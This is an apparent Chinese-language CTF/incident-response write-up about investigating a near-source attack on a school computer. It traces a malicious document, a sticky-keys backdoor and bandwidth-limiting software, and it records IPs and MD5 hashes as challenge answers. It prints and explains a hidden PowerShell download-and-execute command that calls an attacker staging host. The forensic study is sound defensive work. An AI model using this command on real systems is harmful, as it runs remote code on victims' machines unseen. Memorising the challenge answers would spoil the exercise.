背景介绍
前景需要:小王从某安全大厂被优化掉后,来到了某私立小学当起了计算机老师。某一天上课的时候,发现鼠标在自己动弹,又发现除了某台电脑,其他电脑连不上网络。感觉肯定有学生捣乱,于是开启了应急。
挑战内容
1.攻击者的外网IP地址
2.攻击者的内网跳板IP地址
3.攻击者使用的限速软件的md5大写
4.攻击者的后门md5大写
5.攻击者留下的flag
解题过程
根据背景介绍,是近源攻击。可以先寻找,修改或增加了哪些文件。
cmd搜索recent打开“最近使用过目录”,寻找可疑文件。
因为不确定哪个是恶意文件,所以都过了一遍沙箱,最后发现”学校放假通知-练习.doc“是一个恶意文件。不知道是系统太老,还是有限制,我的优盘识别不了,所以使用远程桌面,添加共享盘。
发现了恶意外联ip
1.攻击者的外网IP地址
2.攻击者的内网跳板IP地址
3.攻击者使用的限速软件的md5大写
4.攻击者的后门md5大写
5.攻击者留下的flag
继续排查桌面文件
桌面文件phpStudy-修复.bot指向了lnk文件夹
而“最近使用过目录”中也出现过,而我在排查“最近使用过目录”,lnk文件夹是空的
估计是隐藏了。在组织这里的文件夹和搜索选项,把隐藏文件的选项关闭。
是一段powershell命令
powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http;//192.168.20.129:801/a'))"
命令解析:
powershell.exe
:启动PowerShell进程。-nop
:不加载任何配置文件,这可以防止加载用户配置文件中的任何函数或别名。-w hidden
:将PowerShell窗口设置为隐藏模式,这可以防止用户注意到正在执行的操作。-c
:表示后面跟着的字符串将作为命令直接执行。IEX
:Invoke-Expression,用于执行传入的字符串表达式。(new-object net.webclient).downloadstring()
:创建一个新的WebClient对象,并使用它从指定的URL下载内容。'http://192.168.20.129:801/a'
:指定从该URL下载内容的地址。
得到攻击者的内网跳板ip地址
1.攻击者的外网IP地址
2.攻击者的内网跳板IP地址
3.攻击者使用的限速软件的md5大写
4.攻击者的后门md5大写
5.攻击者留下的flag
桌面基本排查完毕,继续排查其他文件,这个系统就一个C盘那就继续看C盘
在PerfLogs文件夹,发现一个不正经的文件夹,最后修改日期也是2024/5/6
在套娃了n层之后发现了限速软件
然后找个哈希计算机算一下哈希值:2A5D8838BDB4D404EC632318C94ADC96
1.攻击者的外网IP地址
2.攻击者的内网跳板IP地址
3.攻击者使用的限速软件的md5大写
4.攻击者的后门md5大写
5.攻击者留下的flag
最后还剩下后门文件,还有flag,没思路了,还在继续排查,根据时间找相关内容和文件
但是如果光手工找也确实比较费劲,文件夹显示2024/5/6,而里面文件时更早时候,反之亦然,所以找的效率就比较低。网上找了cmd命令和powershell命令都失败了
灵机一动,可以用文件管理系统自带的搜索功能
尽管如此,工作量依然不小,找了一会儿之后,在windows\system32目录下,发现了一个python编译的exe文件,这就比较可疑了
允许之后出现了flag
网上搜索shift后门,原来是连续按五下shift触发粘滞键后门,但我感觉这个一个比较难触发吧,除非时玩游戏。
依然,计算MD5值:58A3FF82A1AFF927809C529EB1385DA1
1.攻击者的外网IP地址
2.攻击者的内网跳板IP地址
3.攻击者使用的限速软件的md5大写
4.攻击者的后门md5大写
5.攻击者留下的flag
攻击视角
近源攻击
2024/5/6 15:25:在桌面放了恶意文件”学校放假通知“
2024/5/6 15:33:设置了shift粘滞键后门
2024/5/6 18:18:创建了windows批处理文件,下载了限速软件